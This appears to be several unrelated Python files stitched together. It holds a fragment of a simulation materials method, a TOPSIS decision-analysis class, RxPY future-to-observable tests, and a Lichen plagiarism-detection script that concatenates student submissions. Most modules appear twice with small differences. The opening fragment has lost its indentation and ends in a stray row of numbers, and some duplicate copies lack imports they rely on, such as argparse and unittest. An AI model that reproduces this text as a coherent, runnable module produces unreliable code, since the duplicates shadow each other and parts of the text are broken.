mat, material_data["Elastic Modulus"][i], "Youngs_Modulus"
)
newmat.youngs_modulus = nominal_val
newmat.youngs_modulus.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Elastic Modulus"][i]
newmat.youngs_modulus = value
self.assign_material(list_mat_obj, mat)
for obj_name in list_mat_obj:
if not self.modeler.primitives[obj_name].surface_material_name:
self.modeler.primitives[obj_name].surface_material_name = "Steel-oxidised-surface"
i += 1
all_objs = [ao for ao in all_objs if ao not in list_mat_obj]
return True
@aedt_exception_handler
def get_all_conductors_names(self):
"""Retrieve all conductors in the active design.
Returns
-------
list of str
List of conductors.
"""
cond = [i.lower() for i in list(self.materials.conductors)]
obj_names = []
for el, obj in self.modeler.primitives.objects.items():
if obj.material_name in cond:
obj_names.append(obj.name)
return obj_names
@aedt_exception_handler
def get_all_dielectrics_names(self):
"""Retrieve all dielectrics in the active design.
Returns
-------
list of str
List of dielectrics.
"""
diel = [i.lower() for i in list(self.materials.dielectrics)]
obj_names = []
for el, obj in self.modeler.primitives.objects.items():
if obj.material_name in diel:
obj_names.append(obj.name)
return obj_names | 0.809276 | 0.354391 |
import numpy as np
from ..normalizations import minmax_normalization
from ..distance_metrics import euclidean
from .mcda_method import MCDA_method
class TOPSIS(MCDA_method):
    def __init__(self, normalization_method = minmax_normalization, distance_metric = euclidean):
        """
        Create the TOPSIS method object and select normalization method `normalization_method` and
        distance metric `distance_metric`.

        Parameters
        -----------
            normalization_method : function
                method for decision matrix normalization chosen from `normalizations`
            distance_metric : functions
                method for calculating the distance between two vectors
        """
        self.normalization_method = normalization_method
        self.distance_metric = distance_metric

    def __call__(self, matrix, weights, types):
        """
        Score alternatives provided in decision matrix `matrix` with m alternatives in rows and
        n criteria in columns using criteria `weights` and criteria `types`.

        Parameters
        ----------
            matrix : ndarray
                Decision matrix with m alternatives in rows and n criteria in columns.
            weights: ndarray
                Vector with criteria weights. Sum of weights must be equal to 1.
            types: ndarray
                Vector with criteria types. Profit criteria are represented by 1 and cost by -1.

        Returns
        -------
            ndarray
                Vector with preference values of each alternative. The best alternative has the highest preference value.

        Examples
        ---------
        >>> topsis = TOPSIS(normalization_method = minmax_normalization, distance_metric = euclidean)
        >>> pref = topsis(matrix, weights, types)
        >>> rank = rank_preferences(pref, reverse = True)
        """
        TOPSIS._verify_input_data(matrix, weights, types)
        return TOPSIS._topsis(matrix, weights, types, self.normalization_method, self.distance_metric)

    @staticmethod
    def _topsis(matrix, weights, types, normalization_method, distance_metric):
        # Normalize the decision matrix and weight each criterion column.
        weighted_matrix = normalization_method(matrix, types) * weights
        # Per-criterion ideal (PIS) and anti-ideal (NIS) reference points.
        ideal = np.max(weighted_matrix, axis=0)
        anti_ideal = np.min(weighted_matrix, axis=0)
        # Distance of every alternative from both reference points.
        dist_to_ideal = np.array([distance_metric(alternative, ideal) for alternative in weighted_matrix])
        dist_to_anti_ideal = np.array([distance_metric(alternative, anti_ideal) for alternative in weighted_matrix])
        # Relative closeness to the ideal solution; higher is better.
        return dist_to_anti_ideal / (dist_to_anti_ideal + dist_to_ideal)
from ..normalizations import minmax_normalization
from ..distance_metrics import euclidean
from .mcda_method import MCDA_method
class TOPSIS(MCDA_method):
    # NOTE(review): duplicate definition — at import time it shadows the
    # earlier TOPSIS class defined above in this file.
    def __init__(self, normalization_method = minmax_normalization, distance_metric = euclidean):
        """
        Create the TOPSIS method object and select normalization method `normalization_method` and
        distance metric `distance_metric`.

        Parameters
        -----------
        normalization_method : function
            method for decision matrix normalization chosen from `normalizations`
        distance_metric : functions
            method for calculating the distance between two vectors
        """
        self.normalization_method = normalization_method
        self.distance_metric = distance_metric
    def __call__(self, matrix, weights, types):
        """
        Score alternatives provided in decision matrix `matrix` with m alternatives in rows and
        n criteria in columns using criteria `weights` and criteria `types`.

        Parameters
        ----------
        matrix : ndarray
            Decision matrix with m alternatives in rows and n criteria in columns.
        weights: ndarray
            Vector with criteria weights. Sum of weights must be equal to 1.
        types: ndarray
            Vector with criteria types. Profit criteria are represented by 1 and cost by -1.

        Returns
        -------
        ndarray
            Vector with preference values of each alternative. The best alternative has the highest preference value.

        Examples
        ---------
        >>> topsis = TOPSIS(normalization_method = minmax_normalization, distance_metric = euclidean)
        >>> pref = topsis(matrix, weights, types)
        >>> rank = rank_preferences(pref, reverse = True)
        """
        TOPSIS._verify_input_data(matrix, weights, types)
        return TOPSIS._topsis(matrix, weights, types, self.normalization_method, self.distance_metric)
    @staticmethod
    def _topsis(matrix, weights, types, normalization_method, distance_metric):
        # Normalize matrix using chosen normalization (for example linear normalization)
        norm_matrix = normalization_method(matrix, types)
        # Multiply all rows of normalized matrix by weights
        weighted_matrix = norm_matrix * weights
        # Calculate vectors of PIS (ideal solution) and NIS (anti-ideal solution)
        pis = np.max(weighted_matrix, axis=0)
        nis = np.min(weighted_matrix, axis=0)
        # Calculate chosen distance of every alternative from PIS and NIS using chosen distance metric `distance_metric` from `distance_metrics`
        Dp = np.array([distance_metric(x, pis) for x in weighted_matrix])
        Dm = np.array([distance_metric(x, nis) for x in weighted_matrix])
        # Relative closeness to the ideal solution; higher is better.
        C = Dm / (Dm + Dp)
        return C
import unittest
from nose import SkipTest
import rx
# rx exposes its optional asyncio/Future bindings through a config mapping.
asyncio = rx.config['asyncio']
# Skip this whole test module on interpreters without asyncio support.
if asyncio is None:
    raise SkipTest("asyncio not available")
Future = rx.config['Future']
from rx import Observable
class TestFromFuture(unittest.TestCase):
    """Tests for Observable.from_future bridging asyncio futures into Rx."""

    def test_future_success(self):
        loop = asyncio.get_event_loop()
        # Flags: [on_next received 42, no error observed, on_completed fired].
        outcome = [False, True, False]

        @asyncio.coroutine
        def scenario():
            future = Future()
            future.set_result(42)
            source = Observable.from_future(future)
            source.subscribe(
                lambda value: outcome.__setitem__(0, 42 == value),
                lambda err: outcome.__setitem__(1, False),
                lambda: outcome.__setitem__(2, True),
            )

        loop.run_until_complete(scenario())
        assert all(outcome)

    def test_future_failure(self):
        loop = asyncio.get_event_loop()
        # Flags: [no on_next, matching error observed, no on_completed].
        outcome = [True, False, True]

        @asyncio.coroutine
        def scenario():
            error = Exception('woops')
            future = Future()
            future.set_exception(error)
            source = Observable.from_future(future)
            source.subscribe(
                lambda value: outcome.__setitem__(0, False),
                lambda err: outcome.__setitem__(1, str(err) == str(error)),
                lambda: outcome.__setitem__(2, False),
            )

        loop.run_until_complete(scenario())
        assert all(outcome)

    def test_future_dispose(self):
        loop = asyncio.get_event_loop()
        # Disposing immediately must suppress every callback.
        outcome = [True, True, True]

        @asyncio.coroutine
        def scenario():
            future = Future()
            future.set_result(42)
            source = Observable.from_future(future)
            subscription = source.subscribe(
                lambda value: outcome.__setitem__(0, False),
                lambda err: outcome.__setitem__(1, False),
                lambda: outcome.__setitem__(2, False),
            )
            subscription.dispose()

        loop.run_until_complete(scenario())
        assert all(outcome)
from nose import SkipTest
import rx
asyncio = rx.config['asyncio']
if asyncio is None:
raise SkipTest("asyncio not available")
Future = rx.config['Future']
from rx import Observable
class TestFromFuture(unittest.TestCase):
    # NOTE(review): duplicate definition — it shadows the earlier
    # TestFromFuture class defined above in this file.
    def test_future_success(self):
        loop = asyncio.get_event_loop()
        # Flags: [on_next received 42, no error observed, on_completed fired].
        success = [False, True, False]
        @asyncio.coroutine
        def go():
            future = Future()
            future.set_result(42)
            source = Observable.from_future(future)
            def on_next(x):
                success[0] = 42 == x
            def on_error(err):
                success[1] = False
            def on_completed():
                success[2] = True
            subscription = source.subscribe(on_next, on_error, on_completed)
        loop.run_until_complete(go())
        assert(all(success))
    def test_future_failure(self):
        loop = asyncio.get_event_loop()
        # Flags: [no on_next, matching error observed, no on_completed].
        success = [True, False, True]
        @asyncio.coroutine
        def go():
            error = Exception('woops')
            future = Future()
            future.set_exception(error)
            source = Observable.from_future(future)
            def on_next(x):
                success[0] = False
            def on_error(err):
                success[1] = str(err) == str(error)
            def on_completed():
                success[2] = False
            subscription = source.subscribe(on_next, on_error, on_completed)
        loop.run_until_complete(go())
        assert(all(success))
    def test_future_dispose(self):
        loop = asyncio.get_event_loop()
        # Disposing immediately must suppress every callback.
        success = [True, True, True]
        @asyncio.coroutine
        def go():
            future = Future()
            future.set_result(42)
            source = Observable.from_future(future)
            def on_next(x):
                success[0] = False
            def on_error(err):
                success[1] = False
            def on_completed():
                success[2] = False
            subscription = source.subscribe(on_next, on_error, on_completed)
            subscription.dispose()
        loop.run_until_complete(go())
        assert(all(success))
import argparse
import os
import sys
import json
import time
import humanize
import fnmatch
import hashlib
from pathlib import Path
# Files present in every submission that carry no plagiarism signal.
IGNORED_FILES = [
    ".submit.timestamp",
    ".user_assignment_access.json"
]
# Load the Lichen-wide configuration (e.g. the concatenation size cap)
# once at import time, from the directory this script is installed in.
with open(Path(__file__).resolve().parent / "lichen_config.json") as lichen_config_file:
    LICHEN_CONFIG = json.load(lichen_config_file)
# returns a string containing the contents of the files which match the regex in the specified dir
def getConcatFilesInDir(input_dir, regex_patterns):
    """Concatenate all files under ``input_dir`` selected by ``regex_patterns``.

    Patterns are fnmatch globs; a pattern starting with ``!`` excludes its
    matches. An empty/blank pattern list selects every file. Each file is
    preceded by a ``==== <name> ====`` separator line.
    """
    result = ""
    for my_dir, _dirs, my_files in os.walk(input_dir):
        files = sorted(my_files)
        # Guard against an empty list (previously raised IndexError); a blank
        # first pattern is equivalent to selecting all files.
        if regex_patterns and regex_patterns[0] != "":
            files_filtered = []
            # First pass: collect files matching the inclusion patterns.
            for pattern in regex_patterns:
                pattern = pattern.strip()
                if not pattern.startswith("!"):
                    files_filtered.extend(fnmatch.filter(files, pattern))
            # Second pass: remove files matching exclusion ("!") patterns.
            # Only the leading "!" is stripped; the previous replace("!", "")
            # also mangled interior "!" such as [!abc] character classes.
            for pattern in regex_patterns:
                pattern = pattern.strip()
                if pattern.startswith("!"):
                    excluded = fnmatch.filter(files_filtered, pattern[1:])
                    files_filtered = [file for file in files_filtered if file not in excluded]
            files = files_filtered
        for my_file in files:
            # exclude any files we have ignored for all submissions
            if my_file in IGNORED_FILES:
                continue
            absolute_path = os.path.join(my_dir, my_file)
            # print a separator & filename, then append the file's contents
            with open(absolute_path, encoding='ISO-8859-1') as tmp:
                result += f"==== {my_file} ====\n"
                result += tmp.read() + "\n"
    return result
# This function is passed a path to a gradeable and an output path to place files in and
# concatenates all of the files for each submission into a single file in the output directory
# returns the total size of the files concatenated
def processGradeable(basepath, config, input_dir, output_dir, total_concat):
    """Concatenate the selected files of every submission under ``input_dir``.

    Writes one ``submission.concatenated`` per user/version under
    ``output_dir`` and returns the running byte total; exits (via
    checkTotalSize) when the configured cap is exceeded.
    """
    # basic error checking
    if not Path(input_dir).exists():
        raise SystemExit(f"ERROR: Unable to find directory {input_dir}")
    if Path(input_dir).group() != Path(basepath).group():
        # fixed: adjacent f-strings previously rendered "does notmatch"
        raise SystemExit(f"ERROR: Group for directory {input_dir} does not "
                         f"match group for {basepath} directory")

    # ``input_dir`` looks like <datapath>/<semester>/<course>/<type>/<gradeable>;
    # its second-to-last component says which Submitty tree we are walking.
    # (The previous code compared the *builtin* ``dir`` function to "results" —
    # always False — so the results/details handling below never ran.)
    input_type = os.path.basename(os.path.dirname(os.path.normpath(input_dir)))

    # loop over each user
    for user in sorted(os.listdir(input_dir)):
        user_path = os.path.join(input_dir, user)
        if not os.path.isdir(user_path):
            continue
        elif user in config["ignore_submissions"]:
            continue

        if config["version"] == "active_version":
            # get the user's active version from their settings file if it exists, else get
            # most recent version for compatibility with early versions of Submitty
            submissions_details_path = os.path.join(user_path, 'user_assignment_settings.json')
            if os.path.exists(submissions_details_path):
                with open(submissions_details_path) as details_file:
                    details_json = json.load(details_file)
                my_active_version = int(details_json["active_version"])
            else:
                # get the most recent version (as an int, so the comparison
                # below can actually match — previously this stayed a string)
                my_active_version = int(sorted(os.listdir(user_path))[-1])

        # loop over each version
        for version in sorted(os.listdir(user_path)):
            version_path = os.path.join(user_path, version)
            if input_type == "results":
                # only the "details" folder within "results" contains files relevant to Lichen
                version_path = os.path.join(version_path, "details")
            if not os.path.isdir(version_path):
                continue
            if config["version"] == "active_version" and int(version) != my_active_version:
                continue

            output_file_path = os.path.join(output_dir, user, version, "submission.concatenated")
            if not os.path.exists(os.path.dirname(output_file_path)):
                os.makedirs(os.path.dirname(output_file_path))

            # append to concatenated file
            with open(output_file_path, "a") as output_file:
                concatenated_contents = getConcatFilesInDir(version_path, config["regex"])
                output_file.write(concatenated_contents)
                total_concat += sys.getsizeof(concatenated_contents)

            # If we've exceeded the concatenation limit, kill program
            checkTotalSize(total_concat)
    return total_concat
def checkTotalSize(total_concat):
    """Exit with an error when the concatenated total exceeds the configured cap."""
    if total_concat > LICHEN_CONFIG['concat_max_total_bytes']:
        # fixed: adjacent strings previously rendered "exceeded<size>" with no space
        raise SystemExit("ERROR! exceeded "
                         f"{humanize.naturalsize(LICHEN_CONFIG['concat_max_total_bytes'])}"
                         " of concatenated files allowed")
def parse_args():
    """Parse the two required positional arguments: basepath and datapath."""
    arg_parser = argparse.ArgumentParser(description="")
    for positional in ("basepath", "datapath"):
        arg_parser.add_argument(positional)
    return arg_parser.parse_args()
def validate(config, args):
    """Sanity-check the Lichen config before any work is done.

    Verifies tokenizer support for the language, threshold/hash bounds,
    absence of ".." path traversal, group permissions on every referenced
    course/path, and the regex directory names. Raises SystemExit with a
    descriptive message on the first failure.
    """
    # load parameters from the config to be checked
    regex_patterns = config["regex"]
    regex_dirs = config["regex_dirs"]
    language = config["language"]
    threshold = int(config["threshold"])
    hash_size = int(config["hash_size"])
    other_gradeables = config["other_gradeables"]

    # Check we have a tokenizer to support the configured language
    langs_data_json_path = "./data.json"  # data.json is in the Lichen/bin directory after install
    with open(langs_data_json_path, 'r') as langs_data_file:
        langs_data = json.load(langs_data_file)
    if language not in langs_data:
        raise SystemExit(f"ERROR: tokenizing not supported for language {language}")

    # Check values of common code threshold and hash size
    if (threshold < 2):
        raise SystemExit("ERROR: threshold must be >= 2")
    if (hash_size < 1):
        raise SystemExit("ERROR: hash_size must be >= 1")

    # Check for backwards crawling
    for e in regex_patterns:
        if ".." in e:
            raise SystemExit('ERROR: Invalid path component ".." in regex')
    for gradeable in other_gradeables:
        for field in gradeable:
            if ".." in field:
                raise SystemExit('ERROR: Invalid component ".." in other_gradeable path')

    # check permissions to make sure we have access to the other gradeables
    my_course_group_perms = Path(args.basepath).group()
    for gradeable in other_gradeables:
        if Path(args.datapath, gradeable["other_semester"], gradeable["other_course"]).group()\
           != my_course_group_perms:
            raise SystemExit("ERROR: Invalid permissions to access course "
                             f"{gradeable['other_semester']}/{gradeable['other_course']}")

    # check permissions for each path we are given (if any are provided)
    if config.get("other_gradeable_paths") is not None:
        for path in config["other_gradeable_paths"]:
            if Path(path).group() != my_course_group_perms:
                # fixed: adjacent f-strings previously rendered "does notmatch"
                raise SystemExit(f"ERROR: Group for directory {path} does not "
                                 f"match group for {args.basepath} directory")

    # make sure each regex directory is one of the acceptable directories
    # (renamed from ``dir`` to avoid shadowing the builtin)
    for regex_dir in regex_dirs:
        if regex_dir not in ["submissions", "results", "checkout"]:
            raise SystemExit(f"ERROR: {regex_dir} is not a valid input directory for Lichen")
def main():
    """Concatenate every submission relevant to this Lichen run.

    Reads and validates ``config.json`` from ``basepath``, concatenates the
    target gradeable, all configured other gradeables, any manually specified
    paths, and the provided code, then reports timing and total size.
    """
    start_time = time.time()
    args = parse_args()

    print("CONCATENATE ALL...", end="")

    config_path = os.path.join(args.basepath, "config.json")
    if not os.path.isfile(config_path):
        raise SystemExit(f"ERROR! invalid config path provided ({config_path})")

    with open(config_path) as config_file:
        config = json.load(config_file)

    # perform error checking on config parameters
    validate(config, args)

    # parameters to be used in this file
    semester = config["semester"]
    course = config["course"]
    gradeable = config["gradeable"]
    regex_patterns = config["regex"]
    regex_dirs = config["regex_dirs"]
    other_gradeables = config["other_gradeables"]
    # optional field -> other_gradeable_paths=None if key doesn't exist
    other_gradeable_paths = config.get("other_gradeable_paths")

    # ==========================================================================
    # loop through and concatenate the selected files for each user in this gradeable
    # (loop variable renamed from ``dir`` to avoid shadowing the builtin)
    total_concat = 0
    for regex_dir in regex_dirs:
        input_path = os.path.join(args.datapath, semester, course, regex_dir, gradeable)
        output_path = os.path.join(args.basepath, "users")
        total_concat = processGradeable(args.basepath, config,
                                        input_path, output_path, total_concat)

    # ==========================================================================
    # loop over all of the other gradeables and concatenate their submissions
    for other_gradeable in other_gradeables:
        for regex_dir in regex_dirs:
            input_path = os.path.join(args.datapath,
                                      other_gradeable["other_semester"],
                                      other_gradeable["other_course"],
                                      regex_dir,
                                      other_gradeable["other_gradeable"])
            output_path = os.path.join(args.basepath, "other_gradeables",
                                       f"{other_gradeable['other_semester']}__{other_gradeable['other_course']}__{other_gradeable['other_gradeable']}")  # noqa: E501
            total_concat = processGradeable(args.basepath, config,
                                            input_path, output_path, total_concat)

    # take care of any manually-specified paths if they exist
    if other_gradeable_paths is not None:
        for path in other_gradeable_paths:
            # We hash the path as the name of the gradeable
            dir_name = hashlib.md5(path.encode('utf-8')).hexdigest()
            output_path = os.path.join(args.basepath, "other_gradeables", dir_name)
            total_concat = processGradeable(args.basepath, config, path,
                                            output_path, total_concat)

    # ==========================================================================
    # iterate over all of the created submissions, checking to see if they are empty
    # and printing a message if so
    empty_directories = []  # holds a list of users who had no files concatenated
    for user in os.listdir(os.path.join(args.basepath, "users")):
        user_path = os.path.join(args.basepath, "users", user)
        for version in os.listdir(user_path):
            version_path = os.path.join(user_path, version)
            my_concatenated_file = os.path.join(version_path, "submission.concatenated")
            with open(my_concatenated_file, "r") as my_cf:
                if my_cf.read() == "":
                    empty_directories.append(f"{user}:{version}")
    if len(empty_directories) > 0:
        print("Warning: No files matched provided regex in selected directories for user(s):",
              ", ".join(empty_directories))

    # do the same for the other gradeables
    for other_gradeable in os.listdir(os.path.join(args.basepath, "other_gradeables")):
        empty_directories = []
        for other_user in os.listdir(os.path.join(args.basepath,
                                                  "other_gradeables", other_gradeable)):
            other_user_path = os.path.join(args.basepath, "other_gradeables",
                                           other_gradeable, other_user)
            for other_version in os.listdir(other_user_path):
                other_version_path = os.path.join(other_user_path, other_version)
                my_concatenated_file = os.path.join(other_version_path, "submission.concatenated")
                with open(my_concatenated_file, "r") as my_cf:
                    if my_cf.read() == "":
                        empty_directories.append(f"{other_user}:{other_version}")
        if len(empty_directories) > 0:
            print("Warning: No files matched provided regex in selected directories for user(s):",
                  ", ".join(empty_directories), "in gradeable", other_gradeable)

    # ==========================================================================
    # concatenate provided code
    with open(os.path.join(args.basepath, "provided_code",
                           "submission.concatenated"), "w") as file:
        provided_code_files = os.path.join(args.basepath, "provided_code", "files")
        provided_concatenated_files = getConcatFilesInDir(provided_code_files, regex_patterns)
        file.write(provided_concatenated_files)
        total_concat += sys.getsizeof(provided_concatenated_files)
        checkTotalSize(total_concat)

    # ==========================================================================
    end_time = time.time()
    print("done in " + "%.0f" % (end_time - start_time) + " seconds,",
          humanize.naturalsize(total_concat) + " concatenated")


if __name__ == "__main__":
    main()
import os
import sys
import json
import time
import humanize
import fnmatch
import hashlib
from pathlib import Path
# Files present in every submission that carry no plagiarism signal.
IGNORED_FILES = [
    ".submit.timestamp",
    ".user_assignment_access.json"
]
# Load the Lichen-wide configuration (e.g. the concatenation size cap)
# once at import time, from the directory this script is installed in.
with open(Path(__file__).resolve().parent / "lichen_config.json") as lichen_config_file:
    LICHEN_CONFIG = json.load(lichen_config_file)
# returns a string containing the contents of the files which match the regex in the specified dir
def getConcatFilesInDir(input_dir, regex_patterns):
    """Concatenate all files under ``input_dir`` selected by ``regex_patterns``.

    Patterns are fnmatch globs; a pattern starting with ``!`` excludes its
    matches. A blank first pattern selects every file. Each file's contents
    are preceded by a ``==== <name> ====`` separator line.
    """
    result = ""
    for my_dir, _dirs, my_files in os.walk(input_dir):
        # Determine if regex should be used (blank regex is equivalent to selecting all files)
        files = sorted(my_files)
        # NOTE(review): an empty ``regex_patterns`` list raises IndexError here — confirm callers.
        if regex_patterns[0] != "":
            files_filtered = []
            # resolve all of the additions
            for e in regex_patterns:
                # Regex patterns starting with a ! indicate that files should be excluded
                if not e.strip().startswith("!"):
                    files_filtered.extend(fnmatch.filter(files, e.strip()))
            # resolve the subtractions
            # NOTE(review): replace("!", "") strips *all* "!" characters, which
            # would mangle interior ones such as [!abc] classes — confirm intended.
            for e in regex_patterns:
                if e.strip().startswith("!"):
                    files_filtered = [file for file in files_filtered if file not in
                                      fnmatch.filter(files_filtered, e.strip().replace("!", ""))]
            files = files_filtered
        for my_file in files:
            # exclude any files we have ignored for all submissions
            if my_file in IGNORED_FILES:
                continue
            absolute_path = os.path.join(my_dir, my_file)
            # print a separator & filename
            with open(absolute_path, encoding='ISO-8859-1') as tmp:
                result += f"==== {my_file} ====\n"
                # append the contents of the file
                result += tmp.read() + "\n"
    return result
# This function is passed a path to a gradeable and an output path to place files in and
# concatenates all of the files for each submission into a single file in the output directory
# returns the total size of the files concatenated
def processGradeable(basepath, config, input_dir, output_dir, total_concat):
    """Concatenate each user's submission files for one gradeable.

    For every (user, version) directory under ``input_dir``, the files selected
    by ``config["regex"]`` are appended to
    ``<output_dir>/<user>/<version>/submission.concatenated``.

    Returns the updated running byte total; aborts via checkTotalSize() when
    the configured cap is exceeded.  Raises SystemExit on a missing input
    directory or a group-permission mismatch with ``basepath``.
    """
    # basic error checking
    if not Path(input_dir).exists():
        raise SystemExit(f"ERROR: Unable to find directory {input_dir}")
    if Path(input_dir).group() != Path(basepath).group():
        # bug fix: message previously rendered as "does notmatch" (missing space)
        raise SystemExit(f"ERROR: Group for directory {input_dir} does not "
                         f"match group for {basepath} directory")
    # Gradeable inputs look like <datapath>/<semester>/<course>/<dir>/<gradeable>,
    # so the parent directory's name identifies which top-level dir we are in.
    # (bug fix: the old check `if dir == "results"` compared the *builtin* `dir`
    # function against a string and therefore never fired)
    in_results_dir = Path(input_dir).parent.name == "results"
    # loop over each user
    for user in sorted(os.listdir(input_dir)):
        user_path = os.path.join(input_dir, user)
        if not os.path.isdir(user_path):
            continue
        elif user in config["ignore_submissions"]:
            continue
        if config["version"] == "active_version":
            # get the user's active version from their settings file if it exists, else get
            # most recent version for compatibility with early versions of Submitty
            submissions_details_path = os.path.join(user_path, 'user_assignment_settings.json')
            if os.path.exists(submissions_details_path):
                with open(submissions_details_path) as details_file:
                    details_json = json.load(details_file)
                my_active_version = int(details_json["active_version"])
            else:
                # bug fix: pick the highest *numeric* version as an int.  The old
                # lexicographic sort put "10" before "9" and produced a str,
                # which the int(version) comparison below could never equal.
                numeric_versions = [int(v) for v in os.listdir(user_path) if v.isdigit()]
                my_active_version = max(numeric_versions) if numeric_versions else 0
        # loop over each version
        for version in sorted(os.listdir(user_path)):
            version_path = os.path.join(user_path, version)
            if in_results_dir:
                # only the "details" folder within "results" contains files relevant to Lichen
                version_path = os.path.join(version_path, "details")
            if not os.path.isdir(version_path):
                continue
            if config["version"] == "active_version" and int(version) != my_active_version:
                continue
            output_file_path = os.path.join(output_dir, user, version, "submission.concatenated")
            # exist_ok avoids a race/crash if the directory was created meanwhile
            os.makedirs(os.path.dirname(output_file_path), exist_ok=True)
            # append to concatenated file
            with open(output_file_path, "a") as output_file:
                concatenated_contents = getConcatFilesInDir(version_path, config["regex"])
                output_file.write(concatenated_contents)
            total_concat += sys.getsizeof(concatenated_contents)
            # If we've exceeded the concatenation limit, kill program
            checkTotalSize(total_concat)
    return total_concat
def checkTotalSize(total_concat, limit=None):
    """Abort with SystemExit when ``total_concat`` exceeds the byte limit.

    ``limit`` defaults to LICHEN_CONFIG['concat_max_total_bytes'], so existing
    callers are unaffected; passing it explicitly makes the check reusable.
    """
    if limit is None:
        limit = LICHEN_CONFIG['concat_max_total_bytes']
    if total_concat > limit:
        # bug fix: the message previously rendered as e.g. "exceeded3.0 MB"
        raise SystemExit("ERROR! exceeded "
                         f"{humanize.naturalsize(limit)}"
                         " of concatenated files allowed")
def parse_args():
    """Parse the two required positional command-line arguments."""
    parser = argparse.ArgumentParser(description="")
    for positional in ("basepath", "datapath"):
        parser.add_argument(positional)
    return parser.parse_args()
def validate(config, args):
    """Sanity-check the Lichen config, raising SystemExit on the first problem."""
    # pull out the parameters that need checking
    regex_patterns = config["regex"]
    regex_dirs = config["regex_dirs"]
    language = config["language"]
    threshold = int(config["threshold"])
    hash_size = int(config["hash_size"])
    other_gradeables = config["other_gradeables"]
    # the installed data.json lists every language we can tokenize
    langs_data_json_path = "./data.json"  # data.json is in the Lichen/bin directory after install
    with open(langs_data_json_path, 'r') as langs_data_file:
        langs_data = json.load(langs_data_file)
    if language not in langs_data:
        raise SystemExit(f"ERROR: tokenizing not supported for language {language}")
    # bounds on the common-code threshold and the hash size
    if threshold < 2:
        raise SystemExit("ERROR: threshold must be >= 2")
    if hash_size < 1:
        raise SystemExit("ERROR: hash_size must be >= 1")
    # reject any attempt at crawling backwards out of the expected directories
    if any(".." in pattern for pattern in regex_patterns):
        raise SystemExit('ERROR: Invalid path component ".." in regex')
    for gradeable in other_gradeables:
        if any(".." in field for field in gradeable):
            raise SystemExit('ERROR: Invalid component ".." in other_gradeable path')
    # we must share a group with every other course we read from
    my_course_group_perms = Path(args.basepath).group()
    for gradeable in other_gradeables:
        other_course = Path(args.datapath, gradeable["other_semester"], gradeable["other_course"])
        if other_course.group() != my_course_group_perms:
            raise SystemExit("ERROR: Invalid permissions to access course "
                             f"{gradeable['other_semester']}/{gradeable['other_course']}")
    # likewise for each manually-specified path (if any are provided)
    if config.get("other_gradeable_paths") is not None:
        for manual_path in config["other_gradeable_paths"]:
            if Path(manual_path).group() != my_course_group_perms:
                raise SystemExit(f"ERROR: Group for directory {manual_path} does not"
                                 f"match group for {args.basepath} directory")
    # every regex directory must be one of the acceptable input directories
    for regex_dir in regex_dirs:
        if regex_dir not in ["submissions", "results", "checkout"]:
            raise SystemExit(f"ERROR: {regex_dir} is not a valid input directory for Lichen")
def main():
    """Concatenate every relevant submission file for this gradeable (plus any
    configured prior-term gradeables and manually-specified paths) into
    per-user/per-version submission.concatenated files under basepath,
    enforcing the configured total-size cap throughout."""
    start_time = time.time()
    args = parse_args()
    print("CONCATENATE ALL...", end="")
    config_path = os.path.join(args.basepath, "config.json")
    if not os.path.isfile(config_path):
        raise SystemExit(f"ERROR! invalid config path provided ({config_path})")
    with open(config_path) as config_file:
        config = json.load(config_file)
    # perform error checking on config parameters
    validate(config, args)
    # parameters to be used in this file
    semester = config["semester"]
    course = config["course"]
    gradeable = config["gradeable"]
    regex_patterns = config["regex"]
    regex_dirs = config["regex_dirs"]
    other_gradeables = config["other_gradeables"]
    # optional field -> other_gradeable_paths=None if key doesn't exist
    other_gradeable_paths = config.get("other_gradeable_paths")
    # ==========================================================================
    # loop through and concatenate the selected files for each user in this gradeable
    total_concat = 0
    for dir in regex_dirs:  # NOTE(review): `dir` shadows the builtin of the same name
        input_path = os.path.join(args.datapath, semester, course, dir, gradeable)
        output_path = os.path.join(args.basepath, "users")
        total_concat = processGradeable(args.basepath, config,
                                        input_path, output_path, total_concat)
    # ==========================================================================
    # loop over all of the other gradeables and concatenate their submissions
    for other_gradeable in other_gradeables:
        for dir in regex_dirs:
            input_path = os.path.join(args.datapath,
                                      other_gradeable["other_semester"],
                                      other_gradeable["other_course"],
                                      dir,
                                      other_gradeable["other_gradeable"])
            # output directory is keyed by semester__course__gradeable
            output_path = os.path.join(args.basepath, "other_gradeables",
                                       f"{other_gradeable['other_semester']}__{other_gradeable['other_course']}__{other_gradeable['other_gradeable']}")  # noqa: E501
            total_concat = processGradeable(args.basepath, config,
                                            input_path, output_path, total_concat)
    # take care of any manually-specified paths if they exist
    if other_gradeable_paths is not None:
        for path in other_gradeable_paths:
            # We hash the path as the name of the gradeable
            dir_name = hashlib.md5(path.encode('utf-8')).hexdigest()
            output_path = os.path.join(args.basepath, "other_gradeables", dir_name)
            total_concat = processGradeable(args.basepath, config, path,
                                            output_path, total_concat)
    # ==========================================================================
    # iterate over all of the created submissions, checking to see if they are empty
    # and printing a message if so
    empty_directories = []  # holds a list of users who had no files concatenated
    for user in os.listdir(os.path.join(args.basepath, "users")):
        user_path = os.path.join(args.basepath, "users", user)
        for version in os.listdir(user_path):
            version_path = os.path.join(user_path, version)
            my_concatenated_file = os.path.join(version_path, "submission.concatenated")
            with open(my_concatenated_file, "r") as my_cf:
                if my_cf.read() == "":
                    empty_directories.append(f"{user}:{version}")
    if len(empty_directories) > 0:
        print("Warning: No files matched provided regex in selected directories for user(s):",
              ", ".join(empty_directories))
    # do the same for the other gradeables (warning is emitted per gradeable)
    for other_gradeable in os.listdir(os.path.join(args.basepath, "other_gradeables")):
        empty_directories = []
        for other_user in os.listdir(os.path.join(args.basepath,
                                                  "other_gradeables", other_gradeable)):
            other_user_path = os.path.join(args.basepath, "other_gradeables",
                                           other_gradeable, other_user)
            for other_version in os.listdir(other_user_path):
                other_version_path = os.path.join(other_user_path, other_version)
                my_concatenated_file = os.path.join(other_version_path, "submission.concatenated")
                with open(my_concatenated_file, "r") as my_cf:
                    if my_cf.read() == "":
                        empty_directories.append(f"{other_user}:{other_version}")
        if len(empty_directories) > 0:
            print("Warning: No files matched provided regex in selected directories for user(s):",
                  ", ".join(empty_directories), "in gradeable", other_gradeable)
    # ==========================================================================
    # concatenate provided code
    with open(os.path.join(args.basepath, "provided_code",
                           "submission.concatenated"), "w") as file:
        provided_code_files = os.path.join(args.basepath, "provided_code", "files")
        provided_concatenated_files = getConcatFilesInDir(provided_code_files, regex_patterns)
        file.write(provided_concatenated_files)
    total_concat += sys.getsizeof(provided_concatenated_files)
    checkTotalSize(total_concat)
    # ==========================================================================
